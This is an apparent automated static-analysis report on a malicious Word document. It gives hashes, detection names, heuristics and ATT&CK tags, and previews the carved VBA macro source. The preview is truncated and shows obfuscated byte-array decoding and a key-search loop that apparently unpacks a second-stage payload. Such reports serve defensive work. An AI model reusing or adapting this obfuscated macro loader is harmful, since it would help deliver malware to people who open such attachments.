Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 161ba501b4ea6f7c…

MALICIOUS

Office (OLE)

118.5 KB Created: 2018-10-17 01:44:00 Authoring application: Microsoft Office Word First seen: 2019-03-18
MD5: 63ada2e84d1426c582fc48a7006b4202 SHA-1: 5640784d291346e7d08bfecc71c3aa60e13c263d SHA-256: 161ba501b4ea6f7c2c8d224e55e566fef95064e1ed059d8287bc07e790f740e8
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, as indicated by multiple heuristics and the ClamAV detection name 'Doc.Malware.Valyria-9761059-0'. The VBA code, though obfuscated, utilizes functions like GetObject and CallByName, suggesting an attempt to execute arbitrary code. The presence of the 'macros.bas' artifact and the detection name strongly imply that the primary function of this document is to act as a malicious attachment, likely for delivering a second-stage payload via its macros.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-9761059-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 41106 bytes
SHA-256: 3dc89ce9e47ac547227e1fe7d588041b07577583676f73a40bf1ffa430ecfd86
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Sub1, 0, 0, MSForms, Frame"
Dim let29, let05(2) As Byte, let0(9) As Byte, let59(32) As Byte, let94(19) As Byte, let47(13) As Byte, let9(6) As Byte, let58(55) As Byte, let34(1267) As Byte, let54(5) As Byte, let22(39) As Byte, let73(39) As Byte, let46(1 To 255) As Byte
Private Function let2(let07() As Byte, let76)
Dim let95, let60
On Error GoTo let72
While let95 <= let76
let60 = let07(let95)
If let60 = 0 Then
Exit Function
End If
let2 = let2 & let97(let60)
let60 = 0
let95 = let95 + 1
Wend
let72:
End Function
Private Function let61()
Dim let06, let39, let70, let17() As Byte, let10, let74
let74 = 1
While let74 <= (187170 / 734)
let46(let74) = let74
let74 = let74 + 1
Wend
let96
let27
let10 = (6626 - 6370)
let49
While let39 = 0
let17 = CStr(let06)
let70 = let66(let17())
If let70 >= 1 Then
let9(2) = let17(0) + (let17(1) * let10)
If let70 >= 3 Then
let9(3) = let17(2) + (let17(3) * let10)
If let70 >= 5 Then
let9(4) = let17(4) + (let17(5) * let10)
If let70 >= 7 Then
let9(5) = let17(6) + (let17(7) * let10)
If let70 >= 9 Then
let9(6) = let17(8) + (let17(9) * let10)
End If
End If
End If
End If
End If
If let23(let35(let22(), let78(let9()), 39), let73, 39) = 1 Then
let39 = 127
End If
let06 = let06 + 1
Wend
If let39 = 127 Then
let93
Else
MsgBox let39
End If
End Function
Private Sub let64()
let05(2) = let46(11)
let05(0) = let46(47)
let05(1) = let46(126)
End Sub
Private Sub let56()
let59(4) = let46(84)
let59(15) = let46(216)
let59(0) = let46(31)
let59(6) = let46(190)
let59(22) = let46(236)
let59(10) = let46(121)
let59(28) = let46(113)
let59(23) = let46(78)
let59(16) = let46(17)
let59(18) = let46(18)
let59(19) = let46(64)
let59(20) = let46(131)
let59(31) = let46(141)
let59(21) = let46(60)
let59(29) = let46(200)
let59(12) = let46(87)
let59(5) = let46(96)
let59(2) = let46(17)
let59(7) = let46(42)
let59(27) = let46(252)
let59(8) = let46(208)
let59(32) = let46(23)
let59(25) = let46(178)
let59(17) = let46(50)
let59(14) = let46(62)
let59(1) = let46(114)
let59(11) = let46(224)
let59(13) = let46(108)
let59(9) = let46(189)
let59(26) = let46(90)
let59(3) = let46(238)
let59(24) = let46(94)
let59(30) = let46(83)
End Sub
Private Sub let99()
let47(11) = let46(236)
let47(2) = let46(30)
let47(5) = let46(68)
let47(0) = let46(59)
let47(7) = let46(42)
let47(4) = let46(93)
let47(13) = let46(111)
let47(10) = let46(120)
let47(9) = let46(174)
let47(1) = let46(107)
let47(3) = let46(244)
let47(6) = let46(164)
let47(12) = let46(70)
let47(8) = let46(158)
End Sub
Private Sub let96()
let73(10) = let46(51)
let73(17) = let46(48)
let73(28) = let46(57)
let73(29) = let46(69)
let73(31) = let46(67)
let73(18) = let46(57)
let73(34) = let46(65)
let73(32) = let46(48)
let73(15) = let46(70)
let73(16) = let46(67)
let73(11) = let46(55)
let73(35) = let46(55)
let73(19) = let46(53)
let73(30) = let46(66)
let73(4) = let46(66)
let73(22) = let46(54)
let73(23) = let46(57)
let73(20) = let46(52)
let73(21) = let46(57)
let73(5) = let46(55)
let73(27) = let46(50)
let73(36) = let46(48)
let73(9) = let46(68)
let73(13) = let46(56)
let73(38) = let46(54)
let73(26) = let46(55)
let73(2) = let46(67)
let73(3) = let46(56)
let73(8) = let46(65)
let73(24) = let46(49)
let73(1) = let46(51)
let73(0) = let46(69)
let73(12) = let46(49)
let73(14) = let46(53)
let73(33) = let46(50)
let73(7) = let46(52)
let73(37) = let46(48)
let73(6) = let46(66)
let73(25) = let46(55)
let73(39) = let46(51)
End Sub
Private Sub let21()
let58(17) = let46(42)
let58(27) = let46(226)
let58(31) = let46(142)
let58(33) = let46(168)
let58(32) = let46(1)
let58(10) = let46(127)
let58(36) = let46(166)
let58(45) = let46(24)
let58(39) = let46(163)
let58(55) = let46(64)
let58(47) = let46(
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.